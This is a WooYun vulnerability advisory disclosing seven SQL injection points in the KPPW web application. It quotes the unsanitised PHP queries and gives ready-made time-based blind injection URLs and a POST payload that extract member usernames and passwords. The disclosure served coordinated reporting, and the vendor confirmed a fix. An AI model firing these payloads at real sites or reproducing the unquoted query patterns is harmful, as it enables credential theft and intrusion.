当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086459

漏洞标题:KPPW最新版SQL注入漏洞七(多处不同注入点)

相关厂商:keke.com

漏洞作者: xfkxfk

提交时间:2014-12-10 11:07

修复时间:2015-03-10 11:08

公开时间:2015-03-10 11:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-10: 细节已通知厂商并且等待厂商处理中
2014-12-10: 厂商已经确认,细节仅向厂商公开
2014-12-13: 细节向第三方安全合作伙伴开放
2015-02-03: 细节向核心白帽子及相关领域专家公开
2015-02-13: 细节向普通白帽子公开
2015-02-23: 细节向实习白帽子公开
2015-03-10: 细节向公众公开

简要描述:

KPPW最新版SQL注入漏洞七(多处不同注入点)

详细说明:

KPPW最新版SQL注入漏洞七,多处不同注入点
第一处sql注入:
文件/control/user/transaction_works.php:

if($action == 'delete_image'){
$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);
$arrFileInfo = db_factory::get_one($strSql);
$resText = CommonClass::delFileByFileId($fileid);
if($resText){
$array = explode(',', $arrServiceInfo['pic']);
$newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array);
$_POST['file_ids'] = implode(",", $newArr);
updateFilepath($arrServiceInfo['service_id'], $_POST['file_ids'], 'pic');
kekezu::echojson('删除成功',1,array('fileid'=>$fileid,'save_name'=>$arrFileInfo['save_name']));die;
}
}


注意这里:

$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);


$fileid没有引号保护进入sql语句,导致存在注入
第二,三处sql注入:
继续看下面的:

$resText = CommonClass::delFileByFileId($fileid);


$fileid继续进入了函数delFileByFileId,跟进函数delFileByFileId:
文件:/lib/inc/CommonClass.php

public static function delFileByFileId($fileId){
$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileId);
$arrFileInfo = db_factory::get_one($strSql);
$filename = S_ROOT.$arrFileInfo['save_name'];
if(file_exists($filename)){
unlink($filename);
}
return db_factory::execute("delete from ".TABLEPRE."witkey_file where file_id = ".$fileId);
}


这里存在两处注入,$fileid变量进入select和delete语句都没有处理,导致sql注入
第四,五,六处sql注入:
同意的问题出现在文件/control/user/transaction_works.php:

if($action == 'delete_goodsfile'){
$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);
$arrFileInfo = db_factory::get_one($strSql);
$resText = CommonClass::delFileByFileId($fileid);
if($resText){
$array = explode(',', $arrServiceInfo['file_path']);
$newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array);
$_POST['file_path_2'] = implode(",", $newArr);
updateFilepath($arrServiceInfo['service_id'], $_POST['file_path_2'], 'file');
kekezu::echojson('删除成功',1,array('fileid'=>$fileid,'save_name'=>$arrFileInfo['save_name']));die;
}
}


这里的问题跟上面分析的问题一样,存在注入。
第七处sql注入:
文件/control/user/transaction_works.php:

if (isset($formhash)&&kekezu::submitcheck($formhash)) {
$arrGoodsConfig = unserialize($kekezu->_model_list[6]['config']);
$goodsprice = floatval($goodsprice);
$floatMinCash = floatval($arrGoodsConfig['min_cash']);
if($floatMinCash&&($goodsprice < $floatMinCash)){
$tips['errors']['goodsprice'] = '最小金额不能少于'.$floatMinCash.'元';
kekezu::show_msg($tips,null,NULL,NULL,'error');
}
if (strtoupper ( CHARSET ) == 'GBK') {
$goodsname = kekezu::utftogbk($goodsname );
$goodsdesc = kekezu::utftogbk($goodsdesc );
$unite_price = kekezu::utftogbk($unite_price );
}
$arrData = array(
'model_id' => $arrServiceInfo['model_id']?$arrServiceInfo['model_id']:6,
'uid' => $gUid,
'username' => $gUserInfo['username'],
'indus_id' => $indus_id,
'indus_pid' => $indus_pid,
'title' => $goodsname,
'price' => $goodsprice,
'pic' => $file_ids,
'content' => $goodsdesc,
'unite_price' => $unite_price,
'submit_method' => $submit_method,
'file_path' => $file_path_2,
'confirm_max' => intval($arrGoodsConfig['confirm_max_day'])
);
if(!$pk['service_id']){
$arrData['profit_rate'] = $arrGoodsConfig['service_profit'];
$arrData['on_time'] = time();
$arrData['service_status'] = 2;
}
$objServiceT = new keke_table_class ( 'witkey_service' );
$objServiceT->save ( $arrData,$pk);
unset($objServiceT);
if ($objId&&$intTaskId) {
$strBidSql = ' UPDATE `'.TABLEPRE.'witkey_task_bid` SET `hasdel`=1 WHERE (`bid_id` ='.$objId.') and task_id = '.$intTaskId;
$strWorkSql = ' UPDATE `'.TABLEPRE.'witkey_task_work` SET `hasdel`=1 WHERE (`work_id`='.$objId.') and task_id = '.$intTaskId;
db_factory::execute($strBidSql);
db_factory::execute($strWorkSql);
}
kekezu::show_msg('操作成功',$strJumpUrl,NULL,NULL,'ok');
}


注意这里的:

$objServiceT->save ( $arrData,$pk);


这里的变量$pk进入了save函数,跟进save函数
文件/lib/inc/keke_table_class.php:

function save($fields, $pk = array()) {
foreach ( $fields as $k => $v ) {
$kk = ucfirst ( $k );
$set_query = "set" . $kk;
$this->_table_obj->$set_query ( $v );
}
$keys = array_keys ( $pk );
$key = $keys [0];
//echo $key."\n";
//print_r($pk);
//echo $pk[$key];
if (! empty ( $pk [$key] )) {
$this->_table_obj->setWhere ( " $key = '" . $pk [$key] . "'" );
$edit_query = "edit_" . $this->_pre . $this->_table_name;
$res = $this->_table_obj->$edit_query ();
} else {
$create_query = "create_" . $this->_pre . $this->_table_name;
$res = $this->_table_obj->$create_query ();
}
if ($res) {
return $res;
} else {
return false;
}
}


最后$pk的key进入了setWhere条件语句中,导致sql注入

漏洞证明:

第一处SQL注入:

http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566) and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23


这里会延迟5秒返回,说明UserName第一个字符为a,继续即可注入出用户信息
第二,三处SQL注入:

http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566 and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)


这里会延迟5秒返回,说明UserName第一个字符为a,继续即可注入出用户信息

1.png


第七处SQL注入:

http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork
formhash=6cb7d4&objId=0&pk%5Bservice_id=1+and+1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23%5D=222222&goodsname=111&goodsdesc=111&indus_pid=249&indus_id=-1&upload=&file_ids=&goodsprice=111&unite_price=%E4%B8%AA&submit_method=outside&file_upload_i=&file_path_2=


这里会延迟5秒返回,说明UserName第一个字符为a,继续即可注入出用户信息

修复方案:

加单引号保护即可

版权声明:转载请注明来源 xfkxfk@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-12-10 17:23

厂商回复:

已修改

最新状态:

暂无


漏洞评价:

评论